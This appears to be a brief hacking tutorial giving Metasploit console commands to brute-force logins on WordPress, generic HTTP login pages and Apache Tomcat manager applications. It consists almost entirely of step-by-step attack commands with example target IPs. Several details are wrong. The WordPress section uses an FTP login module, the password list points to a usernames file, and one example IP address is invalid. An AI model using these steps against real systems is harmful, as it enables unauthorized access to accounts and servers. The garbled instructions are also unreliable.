1) BRUTE FORCE ATTACK ON WORDPRESS:
We can perform brute force attack on wordpress website by Metasploit. To do this run the following commands;
(msfconsole)
(use auxiliary/scanner/ftp/ftp_login)
(show options)
(set RHOSTS + ip of target)e.g. (set RHOSTS 192.168.1.8)
(set THREADS + numbers of attacks) e.g. (set THREADS 255)
(set USER_FILE + path of usernames file) e.g. (set USER_FILE /root/Desktop/usernames.txt)
(set PASS_FILE + path of usernames file) e.g. (set PASS_FILE /root/Desktop/usernames.txt)
(run)
2) BRUTE FORCE ATTACK ON HTTP SERVICE OF TARGET:
We can perform brute force attack on http service of target website by using following commands in Metasploit;
(msfconsole)
(use auxiliary/scanner/http/http_login)
(show option)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4)
(set AUTH_URI + /path of http login/) e.g. (set AUTH_URI /xmpp/)
(run)
3) BRUTE FORCE ATTACK ON TOMCAT MANAGER APPLICATION OF TARGET:
We can perform brute force attack on tomcat manager application of target by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/http/tomcat_mgr_login)
(show option)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.200)
(set RPORT + port of tomcat target) e.g. (set RPORT 8180)
(run)